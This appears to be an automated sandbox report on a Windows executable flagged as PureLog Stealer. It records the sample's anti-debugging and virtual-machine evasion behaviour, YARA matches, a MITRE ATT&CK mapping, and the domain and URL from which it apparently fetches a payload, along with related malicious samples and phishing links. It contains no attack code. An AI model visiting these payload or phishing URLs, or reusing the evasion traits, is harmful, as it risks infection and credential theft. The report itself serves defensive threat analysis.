Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Window / User API: threadDelayed 1143			Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Window / User API: threadDelayed 3120			Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 3320	Thread sleep count: 1143 > 30	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 3320	Thread sleep count: 3120 > 30	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99864s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -99110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98864s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98596s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98362s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -97985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe TID: 5492	Thread sleep time: -97610s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99864	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99610	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99485	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99360	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99235	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 99110	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98985	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98864	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98596	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98362	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Thread delayed: delay time: 97610	Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001333000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Queries volume information: C:\Users\user\Desktop\q86onx3LvU.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.q86onx3LvU.exe.4d54c18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4f80a40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4d54c18.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4f80a40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1449645106.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449645106.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.q86onx3LvU.exe.4d54c18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4f80a40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4d54c18.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q86onx3LvU.exe.4f80a40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1449645106.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449645106.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 Query Registry	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
q86onx3LvU.exe	53%	ReversingLabs	Win32.Trojan.Leonem
q86onx3LvU.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://nexoproducciones.cl/Fgaxcapme.mp3#EnableInitializer1jd5Ef2ZS9fTVqPfeqDQhpg==	0%	Avira URL Cloud	safe
http://nexoproducciones.cld	0%	Avira URL Cloud	safe
https://nexoproducciones.cl/Fgaxcapme.mp3	0%	Avira URL Cloud	safe
https://nexoproducciones.cl	0%	Avira URL Cloud	safe
http://nexoproducciones.cl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nexoproducciones.cl	104.21.10.178	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://nexoproducciones.cl/Fgaxcapme.mp3	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.10.dr	false	URL Reputation: safe	unknown
http://nexoproducciones.cld	q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nexoproducciones.cl/Fgaxcapme.mp3#EnableInitializer1jd5Ef2ZS9fTVqPfeqDQhpg==	q86onx3LvU.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, q86onx3LvU.exe, 00000000.00000002.1449216214.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nexoproducciones.cl	q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nexoproducciones.cl	q86onx3LvU.exe, 00000000.00000002.1449216214.0000000003271000.00000004.00000800.00020000.00000000.sdmp, q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.10.178	nexoproducciones.cl	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467002
Start date and time:	2024-07-03 16:16:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	q86onx3LvU.exe renamed because original name is a hash value
Original Sample Name:	74ef4e409c39d19ad4ed3bacde598f0b92c999de77961354300033f5a917b938.exe
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@2/5@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target q86onx3LvU.exe, PID 6740 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: q86onx3LvU.exe

Simulations

Behavior and APIs

Time	Type	Description
10:17:01	API Interceptor	19x Sleep call for process: q86onx3LvU.exe modified
10:17:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.10.178	Solicitud de presupuesto_____________________________.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	nexoproducciones.cl/Cmtjdjn.wav

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nexoproducciones.cl	filesno5670023475729374.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Transferir copia________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Solicitud de presupuesto_____________________________.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Orders34754733________________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.146.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	188.114.96.3
	https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.2.184
	8bwKawHg0Z.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	7RsDGpyOQk.exe	Get hash	malicious	FormBook	Browse	104.21.84.69
	ptKNiAaGus.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	Quarantined Messages (1).zip	Get hash	malicious	HTMLPhisher	Browse	172.67.148.54
	1hibLFnCm1.exe	Get hash	malicious	DCRat	Browse	104.21.90.190
	beK7HmoXro.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	https://uglb4.roperelo.com/caGPey/	Get hash	malicious	Unknown	Browse	104.17.2.184

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	tgBNtoWqIp.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	19808bS58f.exe	Get hash	malicious	AgentTesla	Browse	104.21.10.178
	SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exe	Get hash	malicious	AgentTesla	Browse	104.21.10.178
	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse	104.21.10.178
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	104.21.10.178
	9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	0VcrCVxnMP.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	E48ALuMJ3m.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	MzjwuZnJF0.exe	Get hash	malicious	GuLoader	Browse	104.21.10.178
	VG0x1LZCFb.exe	Get hash	malicious	AgentTesla	Browse	104.21.10.178

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_q86onx3LvU.exe_735e19e9cc503aa4d8b24e5bfe4db6f9da4f38_290d446c_3a49521a-32b8-4d8e-92a6-47e870a182c5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1847787294193206
Encrypted:	false
SSDEEP:	192:6Sue5OBBUKQD0BU/aauZFA/mtzuiFGZ24IO8GMV:cxnUSBU/aaGqutzuiFGY4IO8GMV
MD5:	FA4743DA0458ABA6A048618055C0635C
SHA1:	512A3475507F13B8E59708F5ED61623315B3A05F
SHA-256:	D3F3F4AB7060F4CAC4CFF90EA91CF6A211732A3D3D46FB2E829CBC557468BE8A
SHA-512:	B5AA704464A575AC19D0A276E2C3930067ABE4272036851290C6C1FAC8ED5B8986A49912DCC13F94117B5A79F17297A15611848B8379B4D5604AD94A78ECE666
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.8.9.8.2.4.5.8.1.1.0.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.8.9.8.2.5.5.4.9.8.5.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.4.9.5.2.1.a.-.3.2.b.8.-.4.d.8.e.-.9.2.a.6.-.4.7.e.8.7.0.a.1.8.2.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.d.d.0.f.c.a.-.a.a.4.a.-.4.5.7.6.-.8.8.5.a.-.e.0.0.0.2.d.5.5.c.d.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.8.6.o.n.x.3.L.v.U...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.s.a.f.p.o.z.w...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.3.-.c.9.9.c.-.0.f.a.c.5.3.c.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.b.3.5.5.e.0.8.e.c.7.6.5.e.4.7.9.1.b.b.2.c.2.b.1.b.2.6.e.4.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.1.8.a.9.c.5.b.9.4.d.f.0.a.d.8.9.3.3.b.4.6.c.2.e.f.3.a.0.a.d.8.8.f.a.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D67.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 3 14:17:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	346153
Entropy (8bit):	3.41200643848539
Encrypted:	false
SSDEEP:	1536:b9LnM79p3QgytTsL2uYGSVX0yQuBojRBpN4uE2aOBayut+iOzCDZSUccMic8+Clb:5jMAgs5Gyit4uEq8yutJxZlELTgcSZg
MD5:	0CB6DEC4E669A7CE3BDEA79FE0A1C39C
SHA1:	7F90529930FA8E2104BBE632EF914B18D4364B81
SHA-256:	192A0120C446B5D609984F881BF9631FD9816B0376841B77A0E2E8D90FF3D068
SHA-512:	4C172A0127916DB3F9750B415B5E73800E9DA20793D60DDD2F4D3B9A3387D903C4D1EECA7D61F0A95E561297BBE818F6AC8294D380BFA3819385D6A431AEC4C7
Malicious:	false
Reputation:	low
